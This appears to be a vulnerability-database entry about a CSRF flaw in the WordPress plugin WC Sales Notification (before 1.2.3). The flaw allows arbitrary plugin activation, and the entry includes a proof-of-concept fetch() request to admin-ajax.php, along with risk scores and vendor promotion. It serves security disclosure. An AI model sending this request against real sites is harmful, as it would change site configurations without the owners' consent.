Lucene search

K

WC Sales Notification < 1.2.3 - Arbitrary Plugin Activation via CSRF

🗓️ 28 Feb 2023 00:00:00Reported by wpvulndbType 
wpexploit
 wpexploit
👁 86 Views

WC Sales Notification Arbitrary Plugin Activation via CSR

Show more
Related
Code
fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wcsalesnotification_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
28 Feb 2023 00:00Current
5.6Medium risk
Vulners AI Score5.6
EPSS0.001
86
.json
Report